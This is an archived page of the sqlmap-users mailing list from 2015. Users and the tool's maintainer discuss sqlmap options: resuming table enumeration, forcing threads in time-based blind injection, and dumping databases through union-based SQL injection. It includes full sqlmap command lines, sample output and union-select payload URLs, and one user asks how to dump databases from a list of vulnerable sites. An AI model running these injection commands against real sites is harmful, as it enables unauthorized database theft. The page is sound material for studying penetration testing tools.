sqlmap-users Mailing List for sqlmap (Page 7)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Miroslav S. <mir...@gm...> - 2015-10-07 09:06:02
|
sqlmap has to find a SQLi. It can't just dump data without knowing anything about the SQLi. Every SQLi technique has different rules for data dumping. I would suggest that you run (if you want to be stricter with your given cases): python sqlmap.py -u "http://hello.com/index.php?id=1" --technique=BU --prefix="" --suffix="-- -" --union-cols=5 python sqlmap.py -u "http://world.com/index.php?page=3" --technique=BU --prefix="" --suffix="-- -" --union-cols=5 Bye On Wed, Oct 7, 2015 at 11:47 AM, bogdan <bog...@ou...> wrote: > Hello! > > I have a list of vulners UnionBased urls(example): > > http://hello.com/index.php?id=-1+and+union+all+select+1,2,3,[point],4,5-- > http://world.com/index.php?page=3+and+union+all+select+1,2,3,4,[point]-- > > How can i to load one url of this list to sqlmap and dumping structure > of database, without finding injecting point? > > Sorry, for my bad English, and Thanks! > > > ------------------------------------------------------------------------------ > Full-scale, agent-less Infrastructure Monitoring from a single dashboard > Integrate with 40+ ManageEngine ITSM Solutions for complete visibility > Physical-Virtual-Cloud Infrastructure monitoring from one console > Real user monitoring with APM Insights and performance trend reports > Learn More > http://pubads.g.doubleclick.net/gampad/clk?id=247754911&iu=/4140 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: bogdan <bog...@ou...> - 2015-10-07 08:49:30
|
Hello! I have a list of vulners UnionBased urls(example): http://hello.com/index.php?id=-1+and+union+all+select+1,2,3,[point],4,5-- http://world.com/index.php?page=3+and+union+all+select+1,2,3,4,[point]-- How can i to load one url of this list to sqlmap and dumping structure of database, without finding injecting point? Sorry, for my bad English, and Thanks! |
From: Indra Z. <net...@gm...> - 2015-09-28 09:18:31
|
Hohoooo Cool thanks On Sep 28, 2015 4:15 PM, "Miroslav Stampar" <mir...@gm...> wrote: > Hi. > > Update to the latest revision and do the following: > > .. --tables --limit=105 > > Bye > > p.s. you are lucky that you are using MySQL as this patch is "doable" (as > MySQL uses LIMIT m,n mechanism) > p.p.s. > > for example: > > A) python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" > --technique=B --tables -D acuart > > returns > > Database: acuart > [8 tables] > +-----------+ > | artists | > | carts | > | categ | > | featured | > | guestbook | > | pictures | > | products | > | users | > +-----------+ > > while > > B) python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" > --technique=B --tables -D acuart --start 5 > > returns > > Database: acuart > [4 tables] > +-----------+ > | guestbook | > | pictures | > | products | > | users | > +-----------+ > > > On Mon, Sep 28, 2015 at 11:04 AM, Miroslav Stampar < > mir...@gm...> wrote: > >> Just a sec. Will do some "adjustments" :) >> >> Bye >> >> On Mon, Sep 28, 2015 at 10:25 AM, Indra Zulkarnain < >> net...@gm...> wrote: >> >>> Mysql >>> On Sep 28, 2015 3:18 PM, "Miroslav Stampar" <mir...@gm...> >>> wrote: >>> >>>> Which DBMS? >>>> >>>> Bye >>>> >>>> On Mon, Sep 28, 2015 at 10:07 AM, Indra Zulkarnain < >>>> net...@gm...> wrote: >>>> >>>>> Hi miro >>>>> >>>>> Owh i see.. >>>>> Ok thanks for the reply >>>>> >>>>> I'm using time based injection so you can imagine how long it takes >>>>> for me to do 113 tables from the start instead of resuming from 105 >>>>> >>>>> Thanks again >>>>> On Sep 28, 2015 2:45 PM, "Miroslav Stampar" < >>>>> mir...@gm...> wrote: >>>>> >>>>>> Hi. >>>>>> >>>>>> You haven't told which SQLi technique has been identified by sqlmap >>>>>> (e.g. boolean-based blind). Also, has sqlmap extracted those table names by >>>>>> common table name search or by regular querying of the system tables (you >>>>>> could remember this from first sqlmap's run). >>>>>> >>>>>> If you are combining --common-tables with regular --tables, >>>>>> especially if the sqlmap uses regular querying of system tables, this won't >>>>>> work. Thing is that sqlmap doesn't know what is the "first table in >>>>>> database", nor "second table in database", nor... All those tables are the >>>>>> same when querying from system tables. Also, there can't be one huge >>>>>> "...WHERE table_name NOT IN ('...','...'...)" as your request would most >>>>>> probably be dropped by the web server (due to its HUGE length). >>>>>> >>>>>> Bye >>>>>> >>>>>> On Mon, Sep 28, 2015 at 3:40 AM, Indra Zulkarnain < >>>>>> net...@gm...> wrote: >>>>>> >>>>>>> Hi, miro thanks for the reply >>>>>>> >>>>>>> Actually I already have 105 tables name crack so I use it in common >>>>>>> tables. >>>>>>> I'm try to run a sqlmap with - - common tables >>>>>>> >>>>>>> So far it works a sqlmap successfully brute force all the 105 table >>>>>>> names >>>>>>> But when I try to resume it with --tables it start from 1 again >>>>>>> >>>>>>> I just thought that if a sqlmap can do start and stop for data >>>>>>> extraction why not table names >>>>>>> On Sep 27, 2015 9:01 PM, "Miroslav Stampar" < >>>>>>> mir...@gm...> wrote: >>>>>>> >>>>>>>> In case of flushing the session, nothing is being left (session is >>>>>>>> erased and overwritten). >>>>>>>> >>>>>>>> Bye >>>>>>>> >>>>>>>> On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain < >>>>>>>> net...@gm...> wrote: >>>>>>>> >>>>>>>>> hi guys >>>>>>>>> >>>>>>>>> is there a way to resume tables injection >>>>>>>>> >>>>>>>>> i already have 105 tables but then i flush the session >>>>>>>>> how do i start from 105 to 113 tables >>>>>>>>> >>>>>>>>> thanks >>>>>>>>> >>>>>>>>> >>>>>>>>> ------------------------------------------------------------------------------ >>>>>>>>> _______________________________________________ >>>>>>>>> sqlmap-users mailing list >>>>>>>>> sql...@li... >>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>>>> >>>>>>>> >>>>>>>> >>>>>>>> >>>>>>>> -- >>>>>>>> Miroslav Stampar >>>>>>>> http://about.me/stamparm >>>>>>>> >>>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> Miroslav Stampar >>>>>> http://about.me/stamparm >>>>>> >>>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > |
From: Miroslav S. <mir...@gm...> - 2015-09-28 09:15:33
|
Hi. Update to the latest revision and do the following: .. --tables --limit=105 Bye p.s. you are lucky that you are using MySQL as this patch is "doable" (as MySQL uses LIMIT m,n mechanism) p.p.s. for example: A) python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=B --tables -D acuart returns Database: acuart [8 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | products | | users | +-----------+ while B) python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=B --tables -D acuart --start 5 returns Database: acuart [4 tables] +-----------+ | guestbook | | pictures | | products | | users | +-----------+ On Mon, Sep 28, 2015 at 11:04 AM, Miroslav Stampar < mir...@gm...> wrote: > Just a sec. Will do some "adjustments" :) > > Bye > > On Mon, Sep 28, 2015 at 10:25 AM, Indra Zulkarnain <net...@gm... > > wrote: > >> Mysql >> On Sep 28, 2015 3:18 PM, "Miroslav Stampar" <mir...@gm...> >> wrote: >> >>> Which DBMS? >>> >>> Bye >>> >>> On Mon, Sep 28, 2015 at 10:07 AM, Indra Zulkarnain < >>> net...@gm...> wrote: >>> >>>> Hi miro >>>> >>>> Owh i see.. >>>> Ok thanks for the reply >>>> >>>> I'm using time based injection so you can imagine how long it takes for >>>> me to do 113 tables from the start instead of resuming from 105 >>>> >>>> Thanks again >>>> On Sep 28, 2015 2:45 PM, "Miroslav Stampar" <mir...@gm...> >>>> wrote: >>>> >>>>> Hi. >>>>> >>>>> You haven't told which SQLi technique has been identified by sqlmap >>>>> (e.g. boolean-based blind). Also, has sqlmap extracted those table names by >>>>> common table name search or by regular querying of the system tables (you >>>>> could remember this from first sqlmap's run). >>>>> >>>>> If you are combining --common-tables with regular --tables, especially >>>>> if the sqlmap uses regular querying of system tables, this won't work. >>>>> Thing is that sqlmap doesn't know what is the "first table in database", >>>>> nor "second table in database", nor... All those tables are the same when >>>>> querying from system tables. Also, there can't be one huge "...WHERE >>>>> table_name NOT IN ('...','...'...)" as your request would most probably be >>>>> dropped by the web server (due to its HUGE length). >>>>> >>>>> Bye >>>>> >>>>> On Mon, Sep 28, 2015 at 3:40 AM, Indra Zulkarnain < >>>>> net...@gm...> wrote: >>>>> >>>>>> Hi, miro thanks for the reply >>>>>> >>>>>> Actually I already have 105 tables name crack so I use it in common >>>>>> tables. >>>>>> I'm try to run a sqlmap with - - common tables >>>>>> >>>>>> So far it works a sqlmap successfully brute force all the 105 table >>>>>> names >>>>>> But when I try to resume it with --tables it start from 1 again >>>>>> >>>>>> I just thought that if a sqlmap can do start and stop for data >>>>>> extraction why not table names >>>>>> On Sep 27, 2015 9:01 PM, "Miroslav Stampar" < >>>>>> mir...@gm...> wrote: >>>>>> >>>>>>> In case of flushing the session, nothing is being left (session is >>>>>>> erased and overwritten). >>>>>>> >>>>>>> Bye >>>>>>> >>>>>>> On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain < >>>>>>> net...@gm...> wrote: >>>>>>> >>>>>>>> hi guys >>>>>>>> >>>>>>>> is there a way to resume tables injection >>>>>>>> >>>>>>>> i already have 105 tables but then i flush the session >>>>>>>> how do i start from 105 to 113 tables >>>>>>>> >>>>>>>> thanks >>>>>>>> >>>>>>>> >>>>>>>> ------------------------------------------------------------------------------ >>>>>>>> _______________________________________________ >>>>>>>> sqlmap-users mailing list >>>>>>>> sql...@li... >>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>>> >>>>>>> >>>>>>> >>>>>>> >>>>>>> -- >>>>>>> Miroslav Stampar >>>>>>> http://about.me/stamparm >>>>>>> >>>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2015-09-28 09:04:08
|
Just a sec. Will do some "adjustments" :) Bye On Mon, Sep 28, 2015 at 10:25 AM, Indra Zulkarnain <net...@gm...> wrote: > Mysql > On Sep 28, 2015 3:18 PM, "Miroslav Stampar" <mir...@gm...> > wrote: > >> Which DBMS? >> >> Bye >> >> On Mon, Sep 28, 2015 at 10:07 AM, Indra Zulkarnain < >> net...@gm...> wrote: >> >>> Hi miro >>> >>> Owh i see.. >>> Ok thanks for the reply >>> >>> I'm using time based injection so you can imagine how long it takes for >>> me to do 113 tables from the start instead of resuming from 105 >>> >>> Thanks again >>> On Sep 28, 2015 2:45 PM, "Miroslav Stampar" <mir...@gm...> >>> wrote: >>> >>>> Hi. >>>> >>>> You haven't told which SQLi technique has been identified by sqlmap >>>> (e.g. boolean-based blind). Also, has sqlmap extracted those table names by >>>> common table name search or by regular querying of the system tables (you >>>> could remember this from first sqlmap's run). >>>> >>>> If you are combining --common-tables with regular --tables, especially >>>> if the sqlmap uses regular querying of system tables, this won't work. >>>> Thing is that sqlmap doesn't know what is the "first table in database", >>>> nor "second table in database", nor... All those tables are the same when >>>> querying from system tables. Also, there can't be one huge "...WHERE >>>> table_name NOT IN ('...','...'...)" as your request would most probably be >>>> dropped by the web server (due to its HUGE length). >>>> >>>> Bye >>>> >>>> On Mon, Sep 28, 2015 at 3:40 AM, Indra Zulkarnain < >>>> net...@gm...> wrote: >>>> >>>>> Hi, miro thanks for the reply >>>>> >>>>> Actually I already have 105 tables name crack so I use it in common >>>>> tables. >>>>> I'm try to run a sqlmap with - - common tables >>>>> >>>>> So far it works a sqlmap successfully brute force all the 105 table >>>>> names >>>>> But when I try to resume it with --tables it start from 1 again >>>>> >>>>> I just thought that if a sqlmap can do start and stop for data >>>>> extraction why not table names >>>>> On Sep 27, 2015 9:01 PM, "Miroslav Stampar" < >>>>> mir...@gm...> wrote: >>>>> >>>>>> In case of flushing the session, nothing is being left (session is >>>>>> erased and overwritten). >>>>>> >>>>>> Bye >>>>>> >>>>>> On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain < >>>>>> net...@gm...> wrote: >>>>>> >>>>>>> hi guys >>>>>>> >>>>>>> is there a way to resume tables injection >>>>>>> >>>>>>> i already have 105 tables but then i flush the session >>>>>>> how do i start from 105 to 113 tables >>>>>>> >>>>>>> thanks >>>>>>> >>>>>>> >>>>>>> ------------------------------------------------------------------------------ >>>>>>> _______________________________________________ >>>>>>> sqlmap-users mailing list >>>>>>> sql...@li... >>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>> >>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> Miroslav Stampar >>>>>> http://about.me/stamparm >>>>>> >>>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > -- Miroslav Stampar http://about.me/stamparm |
From: Indra Z. <net...@gm...> - 2015-09-28 08:25:48
|
Mysql On Sep 28, 2015 3:18 PM, "Miroslav Stampar" <mir...@gm...> wrote: > Which DBMS? > > Bye > > On Mon, Sep 28, 2015 at 10:07 AM, Indra Zulkarnain <net...@gm... > > wrote: > >> Hi miro >> >> Owh i see.. >> Ok thanks for the reply >> >> I'm using time based injection so you can imagine how long it takes for >> me to do 113 tables from the start instead of resuming from 105 >> >> Thanks again >> On Sep 28, 2015 2:45 PM, "Miroslav Stampar" <mir...@gm...> >> wrote: >> >>> Hi. >>> >>> You haven't told which SQLi technique has been identified by sqlmap >>> (e.g. boolean-based blind). Also, has sqlmap extracted those table names by >>> common table name search or by regular querying of the system tables (you >>> could remember this from first sqlmap's run). >>> >>> If you are combining --common-tables with regular --tables, especially >>> if the sqlmap uses regular querying of system tables, this won't work. >>> Thing is that sqlmap doesn't know what is the "first table in database", >>> nor "second table in database", nor... All those tables are the same when >>> querying from system tables. Also, there can't be one huge "...WHERE >>> table_name NOT IN ('...','...'...)" as your request would most probably be >>> dropped by the web server (due to its HUGE length). >>> >>> Bye >>> >>> On Mon, Sep 28, 2015 at 3:40 AM, Indra Zulkarnain < >>> net...@gm...> wrote: >>> >>>> Hi, miro thanks for the reply >>>> >>>> Actually I already have 105 tables name crack so I use it in common >>>> tables. >>>> I'm try to run a sqlmap with - - common tables >>>> >>>> So far it works a sqlmap successfully brute force all the 105 table >>>> names >>>> But when I try to resume it with --tables it start from 1 again >>>> >>>> I just thought that if a sqlmap can do start and stop for data >>>> extraction why not table names >>>> On Sep 27, 2015 9:01 PM, "Miroslav Stampar" <mir...@gm...> >>>> wrote: >>>> >>>>> In case of flushing the session, nothing is being left (session is >>>>> erased and overwritten). >>>>> >>>>> Bye >>>>> >>>>> On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain < >>>>> net...@gm...> wrote: >>>>> >>>>>> hi guys >>>>>> >>>>>> is there a way to resume tables injection >>>>>> >>>>>> i already have 105 tables but then i flush the session >>>>>> how do i start from 105 to 113 tables >>>>>> >>>>>> thanks >>>>>> >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sql...@li... >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
From: Miroslav S. <mir...@gm...> - 2015-09-28 08:18:47
|
Which DBMS? Bye On Mon, Sep 28, 2015 at 10:07 AM, Indra Zulkarnain <net...@gm...> wrote: > Hi miro > > Owh i see.. > Ok thanks for the reply > > I'm using time based injection so you can imagine how long it takes for me > to do 113 tables from the start instead of resuming from 105 > > Thanks again > On Sep 28, 2015 2:45 PM, "Miroslav Stampar" <mir...@gm...> > wrote: > >> Hi. >> >> You haven't told which SQLi technique has been identified by sqlmap (e.g. >> boolean-based blind). Also, has sqlmap extracted those table names by >> common table name search or by regular querying of the system tables (you >> could remember this from first sqlmap's run). >> >> If you are combining --common-tables with regular --tables, especially if >> the sqlmap uses regular querying of system tables, this won't work. Thing >> is that sqlmap doesn't know what is the "first table in database", nor >> "second table in database", nor... All those tables are the same when >> querying from system tables. Also, there can't be one huge "...WHERE >> table_name NOT IN ('...','...'...)" as your request would most probably be >> dropped by the web server (due to its HUGE length). >> >> Bye >> >> On Mon, Sep 28, 2015 at 3:40 AM, Indra Zulkarnain <net...@gm... >> > wrote: >> >>> Hi, miro thanks for the reply >>> >>> Actually I already have 105 tables name crack so I use it in common >>> tables. >>> I'm try to run a sqlmap with - - common tables >>> >>> So far it works a sqlmap successfully brute force all the 105 table >>> names >>> But when I try to resume it with --tables it start from 1 again >>> >>> I just thought that if a sqlmap can do start and stop for data >>> extraction why not table names >>> On Sep 27, 2015 9:01 PM, "Miroslav Stampar" <mir...@gm...> >>> wrote: >>> >>>> In case of flushing the session, nothing is being left (session is >>>> erased and overwritten). >>>> >>>> Bye >>>> >>>> On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain < >>>> net...@gm...> wrote: >>>> >>>>> hi guys >>>>> >>>>> is there a way to resume tables injection >>>>> >>>>> i already have 105 tables but then i flush the session >>>>> how do i start from 105 to 113 tables >>>>> >>>>> thanks >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > -- Miroslav Stampar http://about.me/stamparm |
From: Indra Z. <net...@gm...> - 2015-09-28 08:07:35
|
Hi miro Owh i see.. Ok thanks for the reply I'm using time based injection so you can imagine how long it takes for me to do 113 tables from the start instead of resuming from 105 Thanks again On Sep 28, 2015 2:45 PM, "Miroslav Stampar" <mir...@gm...> wrote: > Hi. > > You haven't told which SQLi technique has been identified by sqlmap (e.g. > boolean-based blind). Also, has sqlmap extracted those table names by > common table name search or by regular querying of the system tables (you > could remember this from first sqlmap's run). > > If you are combining --common-tables with regular --tables, especially if > the sqlmap uses regular querying of system tables, this won't work. Thing > is that sqlmap doesn't know what is the "first table in database", nor > "second table in database", nor... All those tables are the same when > querying from system tables. Also, there can't be one huge "...WHERE > table_name NOT IN ('...','...'...)" as your request would most probably be > dropped by the web server (due to its HUGE length). > > Bye > > On Mon, Sep 28, 2015 at 3:40 AM, Indra Zulkarnain <net...@gm...> > wrote: > >> Hi, miro thanks for the reply >> >> Actually I already have 105 tables name crack so I use it in common >> tables. >> I'm try to run a sqlmap with - - common tables >> >> So far it works a sqlmap successfully brute force all the 105 table names >> But when I try to resume it with --tables it start from 1 again >> >> I just thought that if a sqlmap can do start and stop for data extraction >> why not table names >> On Sep 27, 2015 9:01 PM, "Miroslav Stampar" <mir...@gm...> >> wrote: >> >>> In case of flushing the session, nothing is being left (session is >>> erased and overwritten). >>> >>> Bye >>> >>> On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain < >>> net...@gm...> wrote: >>> >>>> hi guys >>>> >>>> is there a way to resume tables injection >>>> >>>> i already have 105 tables but then i flush the session >>>> how do i start from 105 to 113 tables >>>> >>>> thanks >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
From: Miroslav S. <mir...@gm...> - 2015-09-28 07:45:10
|
Hi. You haven't told which SQLi technique has been identified by sqlmap (e.g. boolean-based blind). Also, has sqlmap extracted those table names by common table name search or by regular querying of the system tables (you could remember this from first sqlmap's run). If you are combining --common-tables with regular --tables, especially if the sqlmap uses regular querying of system tables, this won't work. Thing is that sqlmap doesn't know what is the "first table in database", nor "second table in database", nor... All those tables are the same when querying from system tables. Also, there can't be one huge "...WHERE table_name NOT IN ('...','...'...)" as your request would most probably be dropped by the web server (due to its HUGE length). Bye On Mon, Sep 28, 2015 at 3:40 AM, Indra Zulkarnain <net...@gm...> wrote: > Hi, miro thanks for the reply > > Actually I already have 105 tables name crack so I use it in common tables. > I'm try to run a sqlmap with - - common tables > > So far it works a sqlmap successfully brute force all the 105 table names > But when I try to resume it with --tables it start from 1 again > > I just thought that if a sqlmap can do start and stop for data extraction > why not table names > On Sep 27, 2015 9:01 PM, "Miroslav Stampar" <mir...@gm...> > wrote: > >> In case of flushing the session, nothing is being left (session is erased >> and overwritten). >> >> Bye >> >> On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain <net...@gm... >> > wrote: >> >>> hi guys >>> >>> is there a way to resume tables injection >>> >>> i already have 105 tables but then i flush the session >>> how do i start from 105 to 113 tables >>> >>> thanks >>> >>> >>> ------------------------------------------------------------------------------ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > -- Miroslav Stampar http://about.me/stamparm |
From: Indra Z. <net...@gm...> - 2015-09-28 01:40:18
|
Hi, miro thanks for the reply Actually I already have 105 tables name crack so I use it in common tables. I'm try to run a sqlmap with - - common tables So far it works a sqlmap successfully brute force all the 105 table names But when I try to resume it with --tables it start from 1 again I just thought that if a sqlmap can do start and stop for data extraction why not table names On Sep 27, 2015 9:01 PM, "Miroslav Stampar" <mir...@gm...> wrote: > In case of flushing the session, nothing is being left (session is erased > and overwritten). > > Bye > > On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain <net...@gm...> > wrote: > >> hi guys >> >> is there a way to resume tables injection >> >> i already have 105 tables but then i flush the session >> how do i start from 105 to 113 tables >> >> thanks >> >> >> ------------------------------------------------------------------------------ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > |
From: Miroslav S. <mir...@gm...> - 2015-09-27 14:01:44
|
In case of flushing the session, nothing is being left (session is erased and overwritten). Bye On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain <net...@gm...> wrote: > hi guys > > is there a way to resume tables injection > > i already have 105 tables but then i flush the session > how do i start from 105 to 113 tables > > thanks > > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: Indra Z. <net...@gm...> - 2015-09-27 03:45:33
|
hi guys is there a way to resume tables injection i already have 105 tables but then i flush the session how do i start from 105 to 113 tables thanks |
From: Tobias G. <tgl...@se...> - 2015-09-26 09:00:39
|
Hi Miroslav, awesome, thanks so much! Best Regards Tobias > -----Ursprüngliche Nachricht----- > Von: Miroslav Stampar [mailto:mir...@gm...] > Gesendet: Samstag, 26. September 2015 00:11 > An: Tobias Glemser > Cc: SqlMap List > Betreff: Re: AW: [sqlmap-users] Force thread even if time based blind? [ > Z1 > UNGESICHERT ] > > Implemented (hidden) switch --force-threads with the latest commit. > > Example sqlmap call: > > python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -- > technique=T --threads=4 --batch --banner --force-threads > > > Bye > > On Fri, Sep 25, 2015 at 10:09 PM, Miroslav Stampar > <mir...@gm...> wrote: > > > I'll make hidden switch and let you know. > > Bye > > On Sep 25, 2015 9:07 PM, "Tobias Glemser" <tgl...@se...> > wrote: > > > Hi Miroslav, > > thanks for your fast reply (as always). > > > I majority of cases you'll get totally wrong results. > In the past it worked quite nice with lots of targets. > > > Also, you are risking to DoS > > the server (especially in case of OR time-based and heavy > queries). > Right. > > > There is no force option nor there will be. > Alright, I'll move to my /lib/techniques/blind/inference.py :) > > Cheers > > Tobias > > > > -----Ursprüngliche Nachricht----- > > Von: Miroslav Stampar > [mailto:mir...@gm...] > > Gesendet: Freitag, 25. September 2015 19:17 > > An: Tobias Glemser > > Cc: SqlMap List > > Betreff: Re: [sqlmap-users] Force thread even if time based > blind? [ Z1 > > UNGESICHERT ] > > > > I majority of cases you'll get totally wrong results. Also, you > are > > risking to DoS > > the server (especially in case of OR time-based and heavy > queries). There > > is > > no force option nor there will be. > > > > Bye > > > > On Sep 25, 2015 7:14 PM, "Tobias Glemser" > <tgl...@se...> wrote: > > > > > > Hi List, > > > > does anybobdy know a way to disable the "multi- > threading is > > considered > > unsafe in time-based data retrieval. Going to switch it off > > automatically" > > thing? I don't care about some wrong characters, I need > speed :) So > > maybe > > there is a "force" option I missed. Thanks in advance. > > > > Tobias > > > > --------------------------------------------------------------------- > --------- > > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > -- > > Miroslav Stampar > http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2015-09-25 22:10:51
|
Implemented (hidden) switch --force-threads with the latest commit. Example sqlmap call: python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=T --threads=4 --batch --banner *--force-threads* Bye On Fri, Sep 25, 2015 at 10:09 PM, Miroslav Stampar < mir...@gm...> wrote: > I'll make hidden switch and let you know. > > Bye > On Sep 25, 2015 9:07 PM, "Tobias Glemser" <tgl...@se...> wrote: > >> Hi Miroslav, >> >> thanks for your fast reply (as always). >> >> > I majority of cases you'll get totally wrong results. >> In the past it worked quite nice with lots of targets. >> >> > Also, you are risking to DoS >> > the server (especially in case of OR time-based and heavy queries). >> Right. >> >> > There is no force option nor there will be. >> Alright, I'll move to my /lib/techniques/blind/inference.py :) >> >> Cheers >> >> Tobias >> >> >> > -----Ursprüngliche Nachricht----- >> > Von: Miroslav Stampar [mailto:mir...@gm...] >> > Gesendet: Freitag, 25. September 2015 19:17 >> > An: Tobias Glemser >> > Cc: SqlMap List >> > Betreff: Re: [sqlmap-users] Force thread even if time based blind? [ Z1 >> > UNGESICHERT ] >> > >> > I majority of cases you'll get totally wrong results. Also, you are >> > risking to DoS >> > the server (especially in case of OR time-based and heavy queries). >> There >> > is >> > no force option nor there will be. >> > >> > Bye >> > >> > On Sep 25, 2015 7:14 PM, "Tobias Glemser" <tgl...@se...> wrote: >> > >> > >> > Hi List, >> > >> > does anybobdy know a way to disable the "multi-threading is >> > considered >> > unsafe in time-based data retrieval. Going to switch it off >> > automatically" >> > thing? I don't care about some wrong characters, I need speed :) >> So >> > maybe >> > there is a "force" option I missed. Thanks in advance. >> > >> > Tobias >> > >> > >> ------------------------------------------------------------------------------ >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> >> -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2015-09-25 20:10:02
|
